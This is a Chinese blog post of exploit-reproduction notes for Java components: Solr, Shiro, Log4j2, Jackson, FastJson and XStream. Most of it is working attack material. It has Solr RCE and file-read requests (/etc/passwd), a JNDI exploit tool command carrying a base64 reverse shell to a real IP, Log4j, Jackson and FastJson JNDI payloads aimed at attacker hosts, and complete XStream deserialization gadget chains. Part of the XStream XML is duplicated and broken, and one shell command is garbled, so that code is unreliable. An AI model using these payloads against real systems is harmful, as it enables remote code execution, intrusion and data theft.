当前位置: 首页 > article >正文

java组件安全

Solr

默认端口:8983

命令执行(cve-2019-17558)

影响版本:5.0.0-8.3.1

https://github.com/jas502n/solr_rce

在这里插入图片描述

远程命令执行(cve-2019-0193)

影响版本:<8.2.0

条件:DataImportHandler模块和Admin UI未开启鉴权

在这里插入图片描述

选择Dataimport功能并选择debug模式,填入以下POC:

<dataConfig>
	<dataSource type="URLDataSource"/>
    <script><![CDATA[
    		function poc(){ java.lang.Runtime.getRuntime().exec("touch /tmp/success");          }  ]]></script>
       <document>    
          <entity name="stackoverflow"            						   url="https://stackoverflow.com/feeds/tag/solr"            processor="XPathEntityProcessor"            forEach="/feed"            transformer="script:poc" />
   </document> 
</dataConfig>

点击Execute with this Confuguration会发送以下请求包:

POST /solr/test/dataimport?_=1565835261600&indent=on&wt=json HTTP/1.1 
Host: localhost:8983 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0 
Accept: application/json, text/plain, */* 
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 
Accept-Encoding: gzip, deflate 
Content-type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest 
Content-Length: 679 
Connection: close 
Referer: http://localhost:8983/solr/ 
Cookie: csrftoken=gzcSR6Sj3SWd3v4ZxmV5OcZuPKbOhI6CMpgp5vIMvr5wQAL4stMtxJqL2sUE8INi; sessionid=snzojzqa5zn187oghf06z6xodulpohpr 

command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22touch+%2Ftmp%2Fsuccess%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport

执行docker compose exec solr ls /tmp,可见/tmp/success已成功创建:

在这里插入图片描述

文件读取&SSRF (CVE-2021-27905)

全版本官方拒绝修复漏洞

获取数据库名

http://47.94.236.117:8983/solr/admin/cores?indexInfo=false&wt=json

在这里插入图片描述

在这里插入图片描述

触发漏洞

curl -i -s -k -X $‘POST’
-H $‘Content-Type: application/json’ --data-binary $‘{“set-property”:{“requestDispatcher.requestParsers.enableRemoteStreaming”:true}}’
$‘http://47.94.236.117:8983/solr/demo/config’

任意文件读取

curl -i -s -k ‘http://47.94.236.117:8983/solr/demo/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd’
在这里插入图片描述

Shiro

CVE_2016_4437 Shiro-550+Shiro-721(RCE)

影响版本:<=1.2.4

在这里插入图片描述

在这里插入图片描述

CVE-2020-11989(身份认证绕过)

影响版本:<1.7.1

POC:/admin/%20

这里admin指的是需要鉴权的目录

在这里插入图片描述

在这里插入图片描述

CVE-2020-1957(身份认证绕过)

影响版本:<1.5.3

Poc:/xxx/…;/admin/

CVE-2022-32532(身份验证绕过)

影响版本:<1.9.1

Poc: /permit/any

Log4j

是一个基于Java的日志记录框架。

l流量特征:${jndi:rmi:///}

Log4j2远程命令执行(CVE-2021-44228)

影响版本:Apache Log4j2 2.0 - 2.15.0-rc1

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTcuNzIuMTIwLjIyLzg4ODggMD4mMQ==}|{base64,-d}|{bash,-i}” -A 117.72.120.22

中间的是base64编码的命令

在这里插入图片描述

将粉色字体payload替换进payload

Payload:${jndi:rmi://117.72.120.22:1099/x83lta}

在这里插入图片描述

url编码后,填在参数值

在这里插入图片描述

执行后发现有请求变化

在这里插入图片描述

成功反弹shell

在这里插入图片描述

Jackson

当下流行的json解释器,主要负责处理Json的序列化和反序列化

代码执行(cve-2020-8840)

条件:

开启enableDefaultTyping()

使用了org.apache.xbean.propertyeditor.JndiConverter第三方依赖

payload:String json = "[\"org.apache.xbean.propertyeditor.JndiConverter\", {\"asText\":\"ldap://117.72.120.22:1389/r8f7d5\"}]";

使用jndi注入工具生成ldap

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTcuNzIuMTIwLjIyLzg4ODggMD4mMQ==}|e64,-d}|{bash,-i}” -A 117.72.120.22

在这里插入图片描述

POC数据包:

POST /Jacksondatabind/attack HTTP/1.1
Host: 123.58.224.8:30331
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: Hm_lvt_deaeca6802357287fb453f342ce28dda=1731237435
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/json
Content-Length: 102

content=[“org.apache.xbean.propertyeditor.JndiConverter”,{“asText”:“rmi://117.72.120.22:1099/mqqwtd”}]

在这里插入图片描述

这里我复现失败了

代码执行 (cve-2020-35728)

影响版本:FasterXML jackson-databind 2.x < 2.9.10.8

payload:

String payload = "[\"com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool\",{\"jndiPath\":\"rmi://47.94.236.117:1099/gtaafz\"}]";

访问路径/Jacksondatabind/attack会出现报错

在这里插入图片描述

复现数据包和cve-2020-35728一模一样

FastJson

阿里巴巴公司开源的json解析器,它可以解析JSON格式的字符串,支持将JavaBean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。

重点就是:不同版本的fastjson,不同的poc

<=1.2.14

poc:

{
“b”:{
“@type”:“com.sun.rowset.JdbcRowSetImpl”,
“dataSourceName”:“rmi://evil.com:9999/TouchFile”,
“autoCommit”:true
}
}

<=1.2.47

{
“a”:{
“@type”:“java.lang.Class”,
“val”:“com.sun.rowset.JdbcRowSetImpl”
},
“b”:{
“@type”:“com.sun.rowset.JdbcRowSetImpl”,
“dataSourceName”:“rmi://evil.com:9999/Exploit”,
“autoCommit”:true
}
}

XStream

代码执行 (CVE-2021-21351)

影响版本:<=1.4.15

使用JNDI注入

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTcuNzIuMTIwLjIyLzg4ODggMD4mMQ==}|{base64,-d}|{bash,-i}” -A 117.72.120.22

在这里插入图片描述

数据包:

POST / HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
Content-Type: application/xml
Content-Length: 3184

<sorted-set>
  <javax.naming.ldap.Rdn_-RdnEntry>
    <type>ysomap</type>
    <value class='com.sun.org.apache.xpath.internal.objects.XRTreeFrag'>
      <m__DTMXRTreeFrag>
        <m__dtm class='com.sun.org.apache.xml.internal.dtm.ref.sax2dtm.SAX2DTM'>
          <m__size>-10086</m__size>
          <m__mgrDefault>
            <__overrideDefaultParser>false</__overrideDefaultParser>
            <m__incremental>false</m__incremental>
            <m__source__location>false</m__source__location>
            <m__dtms>
              <null/>
            </m__dtms>
            <m__defaultHandler/>
          </m__mgrDefault>
          <m__shouldStripWS>false</m__shouldStripWS>
          <m__indexing>false</m__indexing>
          <m__incrementalSAXSource class='com.sun.org.apache.xml.internal.dtm.ref.IncrementalSAXSource_Xerces'>
            <fPullParserConfig class='com.sun.rowset.JdbcRowSetImpl' serialization='custom'>
              <javax.sql.rowset.BaseRowSet>
                <default>
                  <concurrency>1008</concurrency>
                  <escapeProcessing>true</escapeProcessing>
                  <fetchDir>1000</fetchDir>
                  <fetchSize>0</fetchSize>
                  <isolation>2</isolation>
                  <maxFieldSize>0</maxFieldSize>
                  <maxRows>0</maxRows>
                  <queryTimeout>0</queryTimeout>
                  <readOnly>true</readOnly>
                  <rowSetType>1004</rowSetType>
                  <showDeleted>false</showDeleted>
                  <dataSource>rmi://evil-ip:1099/example</dataSource>
                  <listeners/>
                  <params/>
                </default>
              </javax.sql.rowset.BaseRowSet>
              <com.sun.rowset.JdbcRowSetImpl>
                <default/>
              </com.sun.rowset.JdbcRowSetImpl>
            </fPullParserConfig>
            <fConfigSetInput>
              <class>com.sun.rowset.JdbcRowSetImpl</class>
              <name>setAutoCommit</name>
              <parameter-types>
                <class>boolean</class>
              </parameter-types>
            </fConfigSetInput>
            <fConfigParse reference='../fConfigSetInput'/>
            <fParseInProgress>false</fParseInProgress>
          </m__incrementalSAXSource>
          <m__walker>
            <nextIsRaw>false</nextIsRaw>
          </m__walker>
          <m__endDocumentOccured>false</m__endDocumentOccured>
          <m__idAttributes/>
          <m__textPendingStart>-1</m__textPendingStart>
          <m__useSourceLocationProperty>false</m__useSourceLocationProperty>
          <m__pastFirstElement>false</m__pastFirstElement>
        </m__dtm>
        <m__dtmIdentity>1</m__dtmIdentity>
      </m__DTMXRTreeFrag>
      <m__dtmRoot>1</m__dtmRoot>
      <m__allowRelease>false</m__allowRelease>
    </value>
  </javax.naming.ldap.Rdn_-RdnEntry>
  <javax.naming.ldap.Rdn_-RdnEntry>
    <type>ysomap</type>
    <value class='com.sun.org.apache.xpath.internal.objects.XString'>
      <m__obj class='string'>test</m__obj>
    </value>
  </javax.naming.ldap.Rdn_-RdnEntry>
</sorted-set>

在这里插入图片描述

我复现失败

代码执行 (CVE-2021-29505)

影响版本:<=1.4.16

POST / HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
Content-Type: application/xml
Content-Length: 3169

<java.util.PriorityQueue serialization='custom'>
    <unserializable-parents/>
    <java.util.PriorityQueue>
        <default>
            <size>2</size>
        </default>
        <int>3</int>
        <javax.naming.ldap.Rdn_-RdnEntry>
            <type>12345</type>
            <value class='com.sun.org.apache.xpath.internal.objects.XString'>
                <m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj>
            </value>
        </javax.naming.ldap.Rdn_-RdnEntry>
        <javax.naming.ldap.Rdn_-RdnEntry>
            <type>12345</type>
            <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
                <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
                    <parsedMessage>true</parsedMessage>
                    <soapVersion>SOAP_11</soapVersion>
                    <bodyParts/>
                    <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
                        <attachmentsInitialized>false</attachmentsInitialized>
                        <nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
                            <aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>
                                <candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>
                                    <names>
                                        <string>aa</string>
                                        <string>aa</string>
                                    </names>
                                    <ctx>
                                        <environment/>
                                        <registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>
                                            <java.rmi.server.RemoteObject>
                                                <string>UnicastRef</string>
                                                <string>evil-ip</string>
                                                <int>1099</int>
                                                <long>0</long>
                                                <int>0</int>
                                                <long>0</long>
                                                <short>0</short>
                                                <boolean>false</boolean>
                                            </java.rmi.server.RemoteObject>
                                        </registry>
                                        <host>evil-ip</host>
                                        <port>1099</port>
                                    </ctx>
                                </candidates>
                            </aliases>
                        </nullIter>
                    </sm>
                </message>
            </value>
        </javax.naming.ldap.Rdn_-RdnEntry>
    </java.util.PriorityQueue>
</java.util.PriorityQueue>
           <host>evil-ip</host>
                                    <port>1099</port>
                                </ctx>
                            </candidates>
                        </aliases>
                    </nullIter>
                </sm>
            </message>
        </value>
    </javax.naming.ldap.Rdn_-RdnEntry>
</java.util.PriorityQueue>

</java.util.PriorityQueue>


[Vulhub - Docker-Compose file for vulnerability environment](https://vulhub.org/#/environments/xstream/CVE-2021-29505/)

http://www.kler.cn/a/398376.html

相关文章:

  • 【Ubuntu24.04】使用服务器
  • LabVIEW中的UDP与TCP比较
  • Unity 2022 Nav Mesh 自动寻路入门
  • Linux(CentOS)安装达梦数据库 dm8
  • git简介和本地仓库创建,并提交修改。git config init status add commit
  • g++与gdb简单学习
  • Scala入门基础(17.1)Set集习题
  • Kotlin深度面试题:协程、密封类和高阶函数
  • 计算机网络 (3)计算机网络的性能
  • React前端框架入门教程:从零开始构建一个简单的任务管理应用
  • 麒麟Server下安装东方通TongLINK/Q
  • 01.02、判定是否互为字符重排
  • 【c++篇】:二叉搜索树--有序存储与高效查找的关键
  • 谷歌新作:Unbounded开放世界RPG,AI定义无限游戏新纪元
  • git 常见冲突场景与解决方法
  • 5.11 ResNet
  • 【最新鸿蒙开发之性能优化——动态加载和延迟加载】
  • mac上使用docker搭建gitlab
  • 虚幻引擎 CEO 谈元宇宙:发展、策略与布局
  • 创建vue3项目步骤
  • Vector Optimization – Multiple Lanes
  • LeetCode题练习与总结:移掉 K 位数字--402
  • 【论文笔记】LLaMA-VID: An Image is Worth 2 Tokens in Large Language Models
  • spring 和 grpc 的整合
  • PHP代码审计 --MVC模型开发框架rce示例
  • [Kotlin标准函数] run、with、apply、also、let、use等